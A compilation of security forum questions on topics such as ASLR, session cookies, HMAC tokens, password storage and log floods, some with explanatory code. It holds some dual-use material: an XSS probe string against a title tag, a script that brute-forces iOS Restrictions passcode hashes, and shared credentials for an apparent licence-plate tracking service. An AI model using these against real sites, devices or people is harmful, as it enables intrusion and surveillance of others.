I wonder why countermeasures against code-injection and control-flow hijacking attacks (e.g. stack-based buffer overflows and heap-based buffer overflows) are mostly implemented in software.
Examples of popular and widely deployed countermeasures are:
- ASLR
- Stack canaries
- Non-executable memory regions
But why exactly are these countermeasures not implemented completely in hardware, or at least supported by hardware? Since reconfigurable hardware (e.g. FPGAs) is affordable nowadays, this approach seems perfectly possible to me.
Or do hardware-based countermeasures exist? And if so, can anyone give me some examples?
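As a side note, one of these countermeasures is easy to observe from user space: ASLR (an OS feature that leans on hardware paging) shows up as the same allocation landing at a different address on each run. A small sketch (it assumes a platform with ASLR enabled; on such systems the two printed addresses will usually differ):

```python
import subprocess
import sys

# Print the address of a fresh heap allocation in a child interpreter.
SNIPPET = "import ctypes; print(ctypes.addressof(ctypes.c_int(0)))"

def sample_address() -> int:
    out = subprocess.run([sys.executable, "-c", SNIPPET],
                         capture_output=True, text=True, check=True)
    return int(out.stdout)

# With ASLR enabled, two runs almost always report different addresses.
addr_a, addr_b = sample_address(), sample_address()
print(hex(addr_a), hex(addr_b))
```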
|
I am taking a web security class and was told by the instructor that most of the websites today use https for authentication and then use a cookie (authentication token) in plain text to keep track of the user.
I wanted to confirm this. For example, when I use Amazon.com, if I have logged in before, Amazon shows something relevant to my history; for this they must be using a cookie. But when I click on Account, an https page is opened. If I am looking at my account details, why would Amazon choose to send a cookie (acting as an authentication token) in plain text? If I can listen on the wire, can't I just steal the cookie and hijack someone's session?
My hypothesis is that websites like Amazon have multiple cookies: some are for pages that don't need https (like the home page) but still keep track of user history; others track whether the user authenticated previously (so the user doesn't need to type the password again), and this type of cookie must always be sent over https.
Can anyone confirm my hypothesis ? (I believe my instructor might not be entirely correct)
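This hypothesis matches what the `Secure` cookie attribute is for: a cookie flagged `Secure` is only ever sent over HTTPS, while unflagged cookies (e.g. for personalization on plain-HTTP pages) travel in the clear and can indeed be stolen by a passive listener. A small illustration with Python's stdlib (cookie names hypothetical):

```python
from http.cookies import SimpleCookie

cookies = SimpleCookie()

# Low-value personalization cookie: sent on plain-HTTP pages too.
cookies["recently-viewed"] = "item123"

# Session/auth cookie: Secure restricts it to HTTPS, HttpOnly hides it
# from JavaScript, so stealing it off the wire is no longer possible.
cookies["session-token"] = "opaque-random-value"
cookies["session-token"]["secure"] = True
cookies["session-token"]["httponly"] = True

print(cookies.output())
```

A site that sends its session cookie without the `Secure` flag over plain HTTP is exactly the session-hijacking scenario the question describes (the attack Firesheep demonstrated).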
|
Transaction Data Signing
I need an idea for a very secure algorithm to authenticate online operations, using PHP on the server and an Android app on the user's device.
What is the idea?
The user tries to log in to the system. The server sends a confirmation request to the user's device (Android).
The user sees the date, country, city, IP, browser and OS of the login attempt in the app, and if all this information matches, he can click confirm. The app will generate an 8-decimal-digit token based on this information and send it to the server; the server will try to generate a token from the same information, and if both tokens match, the server accepts the login attempt.
This is just one possible operation.
What do I need?
A universal algorithm to authenticate any online operation.
e.g.:
function generateRandomTokenUsingNParameters() {
    $args  = func_num_args();
    $token = ""; // Start token
    for ($i = 0; $i < $args; $i++) {
        $token = CRAZY_MATH_USING_ALL_PARAMETERS_TO_GENERATE_8_DIGITS_TOKEN($token, func_get_arg($i));
    }
    return $token; // Final token based on all details of the operation
}

// e.g.
// LOGIN INFORMATION
$date = "2014-05-30 01:02:00";
$ip = "192.168.0.1";
$browser = "Chrome";
$city = "Los Angeles";
$country = "USA";
$os = "Windows";
$android_app_local_seed = "698dc19d489c4e4db73e28a713eab07b"; // each user has a different seed in his app

// PRINTING LOGIN TOKEN
echo generateRandomTokenUsingNParameters($date, $ip, $browser, $city, $country, $os, $android_app_local_seed);
What would you use in the CRAZY_MATH_USING_ALL_PARAMETERS_TO_GENERATE_8_DIGITS_TOKEN() function?
P.S.: I need an 8-decimal-digit numeric token, because if the user does not have an internet connection, he can read the operation's details via QR code and will need to enter the token into the system manually.
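For the CRAZY_MATH step, one defensible choice is an HMAC over the concatenated details, keyed by the per-device seed, truncated to 8 decimal digits the same way HOTP (RFC 4226) truncates to 6. A sketch in Python for brevity (the PHP version would use hash_hmac); the join format is an assumption that both sides would have to implement identically:

```python
import hashlib
import hmac

def generate_token(seed: bytes, *details: str) -> str:
    """Derive an 8-digit token from the per-device seed and the operation
    details (date, IP, browser, ...). Server and app compute this
    independently and compare the results."""
    message = "|".join(details).encode("utf-8")
    digest = hmac.new(seed, message, hashlib.sha256).digest()
    # RFC 4226-style dynamic truncation, then reduce to 8 decimal digits.
    offset = digest[-1] & 0x0F
    code = int.from_bytes(digest[offset:offset + 4], "big") & 0x7FFFFFFF
    return f"{code % 10**8:08d}"

token = generate_token(b"698dc19d489c4e4db73e28a713eab07b",
                       "2014-05-30 01:02:00", "192.168.0.1", "Chrome",
                       "Los Angeles", "USA", "Windows")
```

The security rests entirely on the secrecy of the seed, not on any "crazy math": with an 8-digit output, the server must also rate-limit attempts, since an online guesser has a 1-in-10^8 chance per try.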
|
A friend shared a "security service" he just read about. Apparently the product is in beta and can thus be tried by anyone right now. I found it very interesting and surprising. I'm curious to know who provides the license plate photos for this product and what legal implications exist with this sort of thing. The service can be found at
https://learn-nvls.com/learn/gui/index.aspx?ProviderType=NormalProvider
for the username: stakeout
password: beta
Entering any valid license plate will return photos of that vehicle on both public and private property, as captured by both private and public agencies (e.g., toll cams, traffic cams, police, et cetera). The app also shows metadata for each photo, such as location and a time profile for when the vehicle is at a certain address.
Thanks for sharing thoughts and answers,
TJ
|
I have a web application that runs on localhost. I have a self-signed certificate for tomcat configured but when loading the website on firefox, I get a security exception. Can I get a CA to sign my SSL certificate so that this error is not thrown?
|
I'm developing medical billing & EHR software. On completion we plan to use AWS for hosting and thus provide SaaS.
Do we need to encrypt the MySQL database in order to keep HIPAA compliance? I'm aware of HIPAA requirements for data at rest but I don't know how it applies to Amazon Web Services.
|
My understanding is that websites are typically recommended to store only hashes of passwords, using a one-way cryptographic hash function. This way, there is no way to retrieve the passwords even if somebody hacks the database.[1]
On the other hand, the financial management website Mint requires you to enter your bank login information. Presumably they use this to access the banking information, so they must store the password in a way that can be retrieved. Yet most reviews I read consider Mint safe.[2] How can it be safe while adhering to a less secure practice for storing bank passwords than a typical website?
[1]For example, see Why is 3DES not used to store passwords?
[2] For example: Is Mint Ready for Your Money?.
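For reference, the one-way storage described in the first paragraph looks roughly like this (a sketch using Python's stdlib PBKDF2; the parameters are illustrative):

```python
import hashlib
import hmac
import os

ITERATIONS = 200_000  # illustrative work factor

def hash_password(password: str, salt: bytes = b"") -> tuple[bytes, bytes]:
    """Store (salt, digest); the password itself is unrecoverable."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt, digest

def verify_password(password: str, salt: bytes, digest: bytes) -> bool:
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return hmac.compare_digest(candidate, digest)
```

Mint cannot use this for your bank credentials: to replay your login at the bank, it must keep them recoverable (encrypted with a key the service itself holds), which is exactly the weaker property the question points at.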
|
I want to create a dual-boot setup such that the content of each OS is separated from the other using encryption. The main point would be to test out potentially harmful software on one OS, and still be able to rely on the integrity of the other OS.
User A uses OS A and User B uses OS B. Let's assume:
both OSes are Windows 7.
two different partitions, one for each copy of Windows.
one physical storage unit available such as on a laptop
attackers may attempt brute force (not the users against each other) using attached hardware or third-party software involving card readers
it is acceptable for each user to be able to destroy the other's Windows by erasing or overwriting a partition.
However neither user should be able to access or modify plaintext data from the other user's partition.
In the past I have arranged this with TrueCrypt and a hidden OS. I am looking for other ideas that are easy to implement and, more importantly, don't take a lot of time. I would prefer an arrangement that includes only open source software.
Is this possible? If so, how?
|
I have a website with some data and MySQL files hosted on it. Is it possible for me to install an intrusion detection system on it, or can IDSs only be installed on my internal network where I have a router?
|
I've read numerous articles about using HMAC and the secret key for client authentication in a RESTful client (Javascript) application today.
Still, I can't find a single source that transparently explains a process that fills the security gaps in the theory.
The secret key is supposed to be secret, which means that only that specific client and the server should know about the key.
Since the secret key should not be transferred over the network, it should be sent over a secure medium such as email. I will not use SSL/TLS, so sending the secret key as a response from the server at login is not an option.
When questioning security, it makes no sense to me.
The only reason why the user would access his email for my application, would be on registration (to activate the account).
My first thought is that a cookie is not safe, but is there another way to store the secret key on the client?
When the user clears his cookies, the secret key is lost. It doesn't feel very logical to send another email with a new secret key every time the cookies are gone; that wouldn't make any sense to the user.
The user will use multiple clients, and a separate secret key should be generated for each client. Setting the key on registration does not sound like an option.
The only thing that would make sense to me is that the client gets its hands on the secret key when the user logs in, as there is no reason to keep the key when the user logs off (or after a certain expiry time).
So the question is easy:
How does the user get the secret key at login, and where is it stored at the client so that it is safe?
I feel a bit surprised that I cannot seem to figure this out.
Lots of answers on the same question seem to beat around the bush, but never hit the sweet spot that makes me understand.
Edit:
After another day of research, I can only conclude that an SSL connection is really required. I just can't see it any other way.
Anyway you put it, the secret has to get to both the client and server.
If this is true, I don't see why so many websites and blogs I've read point to HMAC as an alternative to Basic Auth + SSL. If there is no transparent way to share the secret key between server and client at login time, then for me there is no point in using HMAC at all.
I find this a pity, as in a RESTful environment every request sent to the server must be authenticated individually.
My application is supposed to send a lot of requests to the server for a hypothetically large number of users, and I am worried about the overhead SSL will cause.
Do correct me if I see this wrongly.
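For completeness, once a shared secret does exist on both sides (however it got there), per-request HMAC authentication is straightforward: each request is signed individually and the secret itself is never transmitted. The header names and message format below are assumptions; distributing the secret in the first place remains the part that needs TLS, as the edit concludes.

```python
import hashlib
import hmac
import time

def sign_request(secret: bytes, method: str, path: str, body: str) -> dict:
    """Headers proving the caller holds `secret` without transmitting it.
    The timestamp limits replay; the server recomputes and compares."""
    timestamp = str(int(time.time()))
    message = "\n".join((method, path, timestamp, body)).encode()
    signature = hmac.new(secret, message, hashlib.sha256).hexdigest()
    return {"X-Timestamp": timestamp, "X-Signature": signature}

def verify_request(secret: bytes, method: str, path: str, body: str,
                   headers: dict, max_skew: int = 300) -> bool:
    if abs(time.time() - int(headers["X-Timestamp"])) > max_skew:
        return False  # stale or replayed request
    message = "\n".join((method, path, headers["X-Timestamp"], body)).encode()
    expected = hmac.new(secret, message, hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, headers["X-Signature"])
```

Note that this authenticates requests but does not encrypt them, so it is a complement to TLS, not a substitute.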
|
With their iOS devices, Apple allows people to block certain applications through "Restrictions". I recently had an issue with my iPhone where I'm positive that I entered the correct passcode on my new phone, but the device refused to give me access. Searching around online shows LOTS of other people claiming the same thing.
I'm wondering if it's actually a bug, or whether we're all just forgetful.
The passcodes are stored in an XML file. Mine was this:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>RestrictionsPasswordKey</key>
<data>
PKu5mw2c2qFkynodAj9rc07KQ+E=
</data>
<key>RestrictionsPasswordSalt</key>
<data>
EPHEAw==
</data>
</dict>
</plist>
Through editing the file and making changes, I can confirm that the following
Key: IxxWEBikzuZi33zUqCBnAcWAavk=
Salt: aSbUXg==
Equals passcode: 1234
Given that each passcode is only four digits, how can I recover my original passcode to see whether it really was what I remember it being, or whether I had mistyped it the first time around?
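Public write-ups report the Restrictions hash as PBKDF2-HMAC-SHA1 with 1000 iterations and a 20-byte derived key (treat those parameters as an assumption and verify against your own plist). With only 10,000 possible passcodes, brute force is near-instant; a sketch:

```python
import base64
import hashlib

def crack_restrictions_pin(key_b64: str, salt_b64: str,
                           iterations: int = 1000):
    """Try all 10,000 four-digit passcodes against the stored hash.
    The KDF parameters are assumptions based on public write-ups of the
    Restrictions plist format -- adjust them if your plist differs."""
    key = base64.b64decode(key_b64)
    salt = base64.b64decode(salt_b64)
    for n in range(10_000):
        pin = f"{n:04d}"
        if hashlib.pbkdf2_hmac("sha1", pin.encode(), salt, iterations,
                               len(key)) == key:
            return pin
    return None
```

Running this on the Key/Salt pair from your own plist either returns the passcode you remember, or shows it was something else all along.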
|
There is no doubt in my mind that spaces should be allowed in passwords. I see some websites disallow spaces and symbols in passwords, and some even enforce a maximum length, which seems totally nonsensical to me.
Normally I'd check that user passwords contain:
minimum of 6 characters
Upper case letters
Lower case letters
Numbers
Symbols
Here's my question:
Which of these categories should the space fall under? Can I count it as a symbol? Or is it in its own category, adding nothing but length to the perceived complexity of the password?
Counting a space as a symbol would allow the following password:
"Ab1 "
Which frankly does not look safe, so should I allow spaces to count as symbols? (And do they add enough complexity to the password to be counted as symbols?)
This is the JavaScript function I usually use to check passwords, but given the above password it will return false, deeming the password insufficiently complex.
function checkPassword(password) {
    return password.length >= 6
        && /[A-Z]/.test(password)
        && /[a-z]/.test(password)
        && /[0-9]/.test(password)
        && /[£:#@~\.,|(etc....)]/.test(password);
}
|
I am trying to find out whether this is vulnerable to XSS: I can control the content of the title tag through the URL. This would make the site vulnerable, if it weren't for the fact that the site only takes the text up to the first forward slash, making it seemingly impossible to close the title tag. I already tried %2F, but the server appears to convert that to a forward slash and therefore cuts the input there. This is possibly mod_rewrite, but without AllowEncodedSlashes.
Example: domain.com/subfolder/myXss</title>bla will lead to ...<title>myXss<</title>
So my question is whether one of these two is possible:
Can I encode a forward slash in some other way?
Can I somehow close the title tag or insert malicious code into it? I can't simply insert a script, as nothing else is allowed within the title tag.
|
For a few days now, the SourceForge project page of TrueCrypt has been displaying a message saying:
WARNING: Using TrueCrypt is not secure as it may contain unfixed security issues
And, the authors are even encouraging users to switch for Microsoft BitLocker program. The press did a lot of comments about this change:
TrueCrypt considered HARMFUL – downloads, website meddled to warn: 'It's not secure' (TheRegister).
Bombshell TrueCrypt advisory: Backdoor? Hack? Hoax? None of the above? (Ars Technica).
Snowden’s Crypto Software May Be Tainted Forever (Wired).
... and so on...
A fork of the project even appeared on a Swiss website.
So, what is really happening? What are these security issues in TrueCrypt? What kind of security risks can be expected if we keep using it?
|
Question
Standard security advice is:
Only download files from websites that you trust.
http://windows.microsoft.com/en-ca/windows/downloading-files-internet-faq
This implies that 1. we are active agents when downloading files from websites and 2. websites cannot download files to our computer without our interaction.
So, let's say I am using Firefox. I go to a sketchy website. Can that website download malicious content to my computer without my interaction or awareness?
Optional Context
I know that web browsers render content on my computer when I surf the web. In one sense then, they are always "downloading" stuff to my computer. Most of that stuff I don't consider to be a download, though. Even streaming videos, while they may cache content, are not downloads in this sense, and I assume these non-downloads do not pose a security threat.
By download, I am talking about what, by default, appears in the Downloads folder of my Windows computer. Usually, I have to click a download link, confirm that I want to save/open the file, and then watch the Firefox download progress. The downloaded file appears in my Downloads folder.
As such, I have given the download permission, I am aware as it is happening, and I can see evidence after it has happened, because it is in my Downloads folder. Further, I have to open the download before it runs. It's an interactive procedure.
Result: I feel safe on a sketchy website, if I do not initiate or accept any downloads. Am I misguided? Can downloads from websites happen without my interaction or awareness?
without my clicking a link on a website
without my giving permission to save/open the file
without the Firefox download progress indicator showing a download, and
without the download appearing in the Downloads folder.
|
I attended B-Sides in Orlando FL where one of the speakers had mentioned a site which contains hardened configs for popular services such as apache and postfix. The author of these configs is anonymous and although he doesn't claim to be an expert most would agree his configs are pretty locked down. I want to say it's "clipso" something but I'm not entirely sure.
Does anyone happen to know this source, or another good source which has hardened base configurations. I'd like to use these as a "wide-net" starting point to hardening some servers.
|
Watching the Snowden interview last night, Brian Williams asks him what degree of control the NSA has over smartphones -- in particular, whether or not they can remotely turn them on in order to collect data. Snowden replies "Yes" and goes on to say some scary things about the kinds of data that government agencies can collect.
I've never heard of this before. What kind of mechanism would facilitate this? Do iPhones have some kind of wake-on-LAN feature? Is this an actual feature which is well known, or conjecture by Snowden? I see this question provides concrete evidence in the case of smart TVs in addition to some hazy assertions that "anything is possible" -- has such a thing been demonstrated to exist?
|
I've been getting the weirdest email messages for the last 2 days in my personal Gmail inbox.
On May 28th, at exactly 4:33 pm BRST, I got about 2,000 emails that look exactly the same; here's the original:
Delivered-To: XXXXXX@gmail.com
Received: by 10.58.195.142 with SMTP id ie14csp9116vec;
Wed, 28 May 2014 17:23:56 -0700 (PDT)
X-Received: by 10.194.48.80 with SMTP id j16mr4624897wjn.44.1401321530931;
Wed, 28 May 2014 16:58:50 -0700 (PDT)
Return-Path: <482265052@attacker.com>
Received: from WIN-EB12TG1C3GU ([212.68.146.41])
by mx.google.com with ESMTP id hl6si35599364wjb.55.2014.05.28.16.58.50
for <XXXXXX@gmail.com>;
Wed, 28 May 2014 16:58:50 -0700 (PDT)
Received-SPF: none (google.com: 482265052@attacker.com does not designate permitted sender hosts) client-ip=212.68.146.41;
Authentication-Results: mx.google.com;
spf=neutral (google.com: 482265052@attacker.com does not designate permitted sender hosts) smtp.mail=482265052@attacker.com
Received: from wv3550 ([127.0.0.1]) by WIN-EB12TG1C3GU with Microsoft SMTPSVC(7.5.7601.17514);
Thu, 29 May 2014 02:33:21 +0300
Date: Thu, 29 May 2014 02:33:21 +0300
Subject: 169992b1286fb7bb8701d0129fa8501a
To: XXXXXX@gmail.com
From:482265052@Attacker.com
Return-Path: 482265052@Attacker.com
Message-ID: <WV3550vAdxaQ6shalxy0002f4b7@WIN-EB12TG1C3GU>
X-OriginalArrivalTime: 28 May 2014 23:33:21.0825 (UTC) FILETIME=[367F9910:01CF7ACD]
Attacker Message
I just changed my email address; everything else is untouched. All 2k messages look very similar and arrived within the same minute. The only differences are the From address and the Subject (the numbers look random).
Today, I got yet another wave, this time over 7,000 emails. Same methodology, but with a different message. Here it is:
Delivered-To: XXXXXX@gmail.com
Received: by 10.58.195.142 with SMTP id ie14csp14708vec;
Fri, 30 May 2014 08:05:10 -0700 (PDT)
X-Received: by 10.180.11.37 with SMTP id n5mr6680977wib.41.1401455833882;
Fri, 30 May 2014 06:17:13 -0700 (PDT)
Return-Path: <634231594@attacker.com>
Received: from WIN-EB12TG1C3GU ([212.68.146.41])
by mx.google.com with ESMTP id cw1si4703530wib.7.2014.05.30.06.17.13
for <XXXXXX@gmail.com>;
Fri, 30 May 2014 06:17:13 -0700 (PDT)
Received-SPF: none (google.com: 634231594@attacker.com does not designate permitted sender hosts) client-ip=212.68.146.41;
Authentication-Results: mx.google.com;
spf=neutral (google.com: 634231594@attacker.com does not designate permitted sender hosts) smtp.mail=634231594@attacker.com
Received: from wv3550 ([127.0.0.1]) by WIN-EB12TG1C3GU with Microsoft SMTPSVC(7.5.7601.17514);
Fri, 30 May 2014 16:16:42 +0300
Date: Fri, 30 May 2014 16:16:42 +0300
Subject: ac2ca78349d53cfa502088e3bf537927
To: XXXXXX@gmail.com
From:634231594@Attacker.com
Return-Path: 634231594@Attacker.com
Message-ID: <WV3550kRaulR0GMhT6D00038f43@WIN-EB12TG1C3GU>
X-OriginalArrivalTime: 30 May 2014 13:16:42.0284 (UTC) FILETIME=[65E12EC0:01CF7C09]
I'm back i am Mauritanian im not using vpn or anything to hide my self
i am black from africa as You mister president
won the election we was happy because maybe we hope u will resolve all the problem
in asia africa but lol nothing just ur first jobs there in white house is to protect israel from what ?
who can beat israel
israel had nuclear bomb
plz before u going to leave white house resolve any problem syrian people and palestin and slavery in Mauritania plz do something
thanks
A search on Google returns nothing. What is that? Should I be concerned?
|
For a long time I've pondered this question. I am aware of the benefits and downsides of dynamic libraries (shared objects), including the infamous article by Drepper.
All other things being equal, isn't a statically linked binary of, say, Nginx or OpenSSH less prone to attacks such as malicious library placement, or other (non-kernel) vectors usually used by attackers?
|
The IP is masked in the Apache log for privacy, except the last octet.
/billing is our application's start page, but it doesn't make sense that it receives POST requests which get 500 responses.
Or maybe this is a legitimate old IE 7 browser that can't handle our site and gets stuck in a loop?
There are about 20,000 such requests:
xx.xx.xx.223 - - [30/May/2014:13:40:54 +0200] "POST /billing HTTP/1.1" 500 613 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)"
xx.xx.xx.223 - - [30/May/2014:13:40:54 +0200] "POST /billing HTTP/1.1" 500 613 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)"
xx.xx.xx.223 - - [30/May/2014:13:40:54 +0200] "POST /billing HTTP/1.1" 500 613 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)"
xx.xx.xx.223 - - [30/May/2014:13:40:54 +0200] "POST /billing HTTP/1.1" 500 613 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)"
xx.xx.xx.223 - - [30/May/2014:13:40:55 +0200] "POST /billing HTTP/1.1" 500 613 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)"
xx.xx.xx.223 - - [30/May/2014:13:40:55 +0200] "POST /billing HTTP/1.1" 500 613 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)"
xx.xx.xx.223 - - [30/May/2014:13:40:56 +0200] "POST /billing HTTP/1.1" 500 613 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)"
xx.xx.xx.223 - - [30/May/2014:13:40:56 +0200] "POST /billing HTTP/1.1" 500 613 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)"
xx.xx.xx.223 - - [30/May/2014:13:40:56 +0200] "POST /billing HTTP/1.1" 500 613 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)"
xx.xx.xx.223 - - [30/May/2014:13:40:56 +0200] "POST /billing HTTP/1.1" 500 613 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)"
xx.xx.xx.223 - - [30/May/2014:13:40:58 +0200] "POST /billing HTTP/1.1" 500 613 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)"
xx.xx.xx.223 - - [30/May/2014:13:40:58 +0200] "POST /billing HTTP/1.1" 500 613 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)"
xx.xx.xx.223 - - [30/May/2014:13:40:58 +0200] "POST /billing HTTP/1.1" 500 613 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)"
xx.xx.xx.223 - - [30/May/2014:13:40:59 +0200] "POST /billing HTTP/1.1" 500 613 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)"
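To decide between "attack" and "stuck browser", it can help to quantify the burst rate per source: several identical POSTs within the same second, sustained for hours, is automation rather than a confused IE 7 user. A quick sketch for counting hits per (IP, second) from lines like the above (the regex assumes the common/combined log format):

```python
import re
from collections import Counter

# ip, [timestamp], "METHOD path ..." from a common/combined-format log line.
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)')

def flood_stats(lines):
    """Count POST /billing hits per (ip, second) to spot bursts that no
    human with a browser could generate."""
    per_second = Counter()
    for line in lines:
        m = LOG_LINE.match(line)
        if m and m.group(3) == "POST" and m.group(4) == "/billing":
            per_second[(m.group(1), m.group(2))] += 1
    return per_second.most_common(5)
```

Feed it the raw lines of access.log; a top entry with many hits inside a single second from one IP settles the question.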
|
While it seems like a bad idea for attackers to be able to use DNSSEC to enumerate subdomains, I cannot think of a specific attack that this information enables, which would not be doable without this information.
|